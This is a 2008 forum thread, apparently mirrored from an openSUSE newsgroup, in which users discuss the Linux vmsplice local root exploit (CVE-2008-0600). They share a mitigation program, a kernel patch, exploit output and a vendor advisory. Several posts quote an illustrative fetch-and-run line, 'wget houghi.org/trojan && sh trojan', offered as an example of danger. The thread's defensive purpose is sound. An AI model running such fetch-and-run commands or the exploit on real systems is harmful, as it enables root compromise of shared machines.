 |
 |
|
|
|
|
Welcome to the { mindfrost82.com } forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact contact us. |
|
|||||||
 |
|
|
LinkBack | Thread Tools | Search this Thread | Display Modes |
02-10-2008, 11:30 PM
|
|||
|
|||
|
Solution for the root exploit
http://disruptive.org.uk/2008/02/10/...t_exploit.html
http://it.slashdot.org/article.pl?sid=08/02/10/2011257 http://www.milw0rm.com/exploits/5092 http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14 1) See that gcc is installed 2) Download http://www.ping.uio.no/~mortehu/disa...-exploitable.c 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` 4) run `./disable-exploitable` Do this on ALL your machines. This is realy serious, as it means that ANY local user can otherwise become root. This means that the following could be extremely dangerous: `wget houghi.org/trojan && sh trojan`, because that could now run a code as root and do whatever. houghi -- The blue light suddenly flashed on my horrified face. What a disaster! Oh, the humanity! I never thought it would happen to me. How terrifying it is to see for yourself "*The Blue Screen of Death*". 
|
|
02-11-2008, 01:48 AM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
> http://disruptive.org.uk/2008/02/10/...t_exploit.html > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 > http://www.milw0rm.com/exploits/5092 > http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14 > > 1) See that gcc is installed > 2) Download > http://www.ping.uio.no/~mortehu/disa...-exploitable.c > 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` > 4) run `./disable-exploitable` > > Do this on ALL your machines. > > This is realy serious, as it means that ANY local user can otherwise > become root. This means that the following could be extremely dangerous: > `wget houghi.org/trojan && sh trojan`, because that could now run a code > as root and do whatever. > > houghi Holy crap! This is the kind of thing I didn't expect to be possible. I'm running a 100+ users system here, and no one of them can be trusted (students); any tips on how to check if someone actually did it? Didn't find anything through the usual means (/var/lob and shell history).
|
|
02-11-2008, 01:52 AM
|
|||
|
|||
|
Re: Solution for the root exploit
Nikos Chantziaras wrote:
> houghi wrote: >> http://disruptive.org.uk/2008/02/10/...t_exploit.html >> http://it.slashdot.org/article.pl?sid=08/02/10/2011257 >> http://www.milw0rm.com/exploits/5092 >> http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14 >> >> 1) See that gcc is installed >> 2) Download >> http://www.ping.uio.no/~mortehu/disa...-exploitable.c >> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` >> 4) run `./disable-exploitable` >> >> Do this on ALL your machines. >> >> This is realy serious, as it means that ANY local user can otherwise >> become root. This means that the following could be extremely dangerous: >> `wget houghi.org/trojan && sh trojan`, because that could now run a code >> as root and do whatever. >> >> houghi > > Holy crap! This is the kind of thing I didn't expect to be possible. > I'm running a 100+ users system here, and no one of them can be trusted > (students); any tips on how to check if someone actually did it? Didn't > find anything through the usual means (/var/lob and shell history). I just tested. The exploit doesn't work on the Fedora 8 stock kernel. Phew. However, it does on the openSUSE 10.3 system ;P
|
|
02-11-2008, 02:23 AM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
> http://disruptive.org.uk/2008/02/10/...t_exploit.html > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 > http://www.milw0rm.com/exploits/5092 > http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14 OK, so those of you running on custom kernels, a temporary patch has appeared upstream that fixes the exploit without disabling vmsplice (some applications won't run without it). http://git.kernel.org/?p=linux/kerne... fb804f49cbc44 Instructions: Open /usr/src/linux/fs/splice.c in a text editor. Go to line 1182. It should read: if (unlikely(!base)) If it's not in line 1182, simply do a search for that line; it only appears one on the whole file. *REPLACE* that line with: if (!access_ok(VERIFY_READ, base, len)) Save, rebuild the kernel and reboot as usual: cd /usr/src/linux sudo make cloneconfig sudo make sudo make modules_install sudo make install sudo /sbin/reboot (If you get a compilation error related to "squashfs", disable the squashfs filesystem in the kernel.) I've tested it and can confirm that this indeed fixes the exploit: ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b0468a7c000 .. 0x2b0468aae000 [-] vmsplice: Bad address
|
|
02-11-2008, 03:13 AM
|
|||
|
|||
|
Re: Solution for the root exploit
On Mon, 11 Feb 2008, houghi wrote:-
>http://disruptive.org.uk/2008/02/10/...t_exploit.html >http://it.slashdot.org/article.pl?sid=08/02/10/2011257 >http://www.milw0rm.com/exploits/5092 >http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14 > >1) See that gcc is installed >2) Download >http://www.ping.uio.no/~mortehu/disa...-exploitable.c >3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` >4) run `./disable-exploitable` > >Do this on ALL your machines. From reading the Debian link, this only affect kernels 2.6.17-2.6.24.1 which translates to openSUSE 10.2, openSUSE 10.3, and also openSUSE 11.0 alpha 2. SUSE 10.1 has kernel 2.6.16.54, which appears to be unaffected by this exploit. Running the compiled code results in the response: davjam@playing:/usr/src/packages/SOURCES> ./disable-vmsplice-if-exploitable ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x38 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [-] mmap: Invalid argument and it terminating. >This is realy serious, as it means that ANY local user can otherwise >become root. This means that the following could be extremely dangerous: >`wget houghi.org/trojan && sh trojan`, because that could now run a code >as root and do whatever. As for the disable-vmsplice-if-exploitable.c, while it appears to work on both my 10.3 32 and 64 bit systems, and fails as expected on 10.1, it fails to compile on my 10.2 64bit system so I can't test it there. Luckily, that 10.2 system isn't net-facing, the only user is myself, and I don't need a root exploit as I know the root password. Doesn't mean I won't be applying the kernel patch that's bound to come out within the next few days. Okay, I couldn't compile it on the 10.2 system so I compiled the source on 10.3 as an un-optimized static ELF binary[0], ran it on 10.2 and that's fixed the exploit. [0] for the curious: gcc -O0 --static -o disable-vmsplice-if-exploitable disable-vmsplice-if-exploitable.c Regards, David Bolt -- www.davjam.org/lifetype/ www.distributed.net: OGR@100Mnodes, RC5-72@15Mkeys SUSE 10.1 32bit | openSUSE 10.2 32bit | openSUSE 10.3 32bit | openSUSE 11.0a1 SUSE 10.1 64bit | openSUSE 10.2 64bit | openSUSE 10.3 64bit RISC OS 3.6 | TOS 4.02 | openSUSE 10.3 PPC |RISC OS 3.11
|
|
02-11-2008, 09:29 PM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
<snip> From the openSUSE security-announce mailinglist: <quote> Hi folks, As you are undoubtly aware a new local root exploit has been discovered on the weekend and reported to a wide audience. The CVE identifier is CVE-2008-0600. The problem affects only kernels 2.6.17 and newer, so it affects only following of our products: - openSUSE 10.2 (2.6.18.x kernel) - openSUSE 10.3 (2.6.22.x kernel) This problem does NOT affect all others products: - SUSE Linux 10.1 (2.6.16.x kernel) - SUSE Linux Enterprise 10 (2.6.16.x kernel) - SUSE Linux Enterprise Server 9 (2.6.5 kernel) - Novell Linux Desktop 9 (2.6.5 kernel) - SUSE Linux Enterprise Server 8 (2.4.21 kernel) Updates are in preparation for openSUSE 10.2 and 10.3 and will hopefully be released tomorrow (Tuesday) morning german time. Test kernel updates are available in our Online Update Betatest Repositories: - openSUSE 10.3: http://download.opensuse.org/update/10.3-test/ kernel version-release of fixed kernel: 2.6.22.17-0.1 - openSUSE 10.2: ftp://ftp.suse.com/pub/suse/update/10.2-test/ kernel version-release of fixed kernel: 2.6.18.8-0.9 Please note that these update channels contain "beta" quality updates, so are not recommended for production use systems. Only use the kernel. Ciao, Marcus </quote> So best do an update tomorrow. houghi -- The blue light suddenly flashed on my horrified face. What a disaster! Oh, the humanity! I never thought it would happen to me. How terrifying it is to see for yourself "*The Blue Screen of Death*".
|
|
02-11-2008, 09:48 PM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
-----------------------------------------------snip----------------------------------- > > So best do an update tomorrow. > > houghi And in the mean time let's hope they've all applied the patch you mentioned previously.... Thanks for the heads up. Applied and waiting.
|
|
02-12-2008, 09:44 AM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` ^^ two hyphens > 4) run `./disable-exploitable` ^ one hyphen It should be '-o disable--exploitable`' and './disable--exploitable' or '-o disable-exploitable`' and './disable-exploitable' right? Could you be a bit specific about what your workaround does, (I'm not much into kernel hacking)? TIA -- Cheerz Lars
|
|
02-12-2008, 11:31 AM
|
|||
|
|||
|
Re: Solution for the root exploit
Lars Behrens wrote:
> > > houghi wrote: > >> 3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable` > ^^ two hyphens >> 4) run `./disable-exploitable` > ^ one hyphen > > It should be '-o disable--exploitable`' and './disable--exploitable' > or '-o disable-exploitable`' and './disable-exploitable' right? Yes, sorry. > Could you be a bit specific about what your workaround does, (I'm not much > into kernel hacking)? It is not my hack. It is a copy and paste hack from somebody else. Basicaly what it does is NOT change the kernel in any way. It just makes it impossible to run the exploit. However when you reboot, the machine is vulrnable again. So you need to run it again at bootup (automagicaly) or patch your system. I myself am waiting for the patch to come out, as I am the sole user on my system. houghi -- You tried, and you failed, so the lesson is, never try. - Homer J. Simpson.
|
|
02-12-2008, 01:00 PM
|
|||
|
|||
|
Re: Solution for the root exploit
houghi wrote:
<snip> The updates are available: Fixed packages have been released for openSUSE 10.2 and 10.3. For SUSE Linux Enterprise Realtime 10 packages are being prepared currently. houghi -- You tried, and you failed, so the lesson is, never try. - Homer J. Simpson.
|
|
|
| Thread Tools | Search this Thread |
| Display Modes | |
|
|
Linear Mode
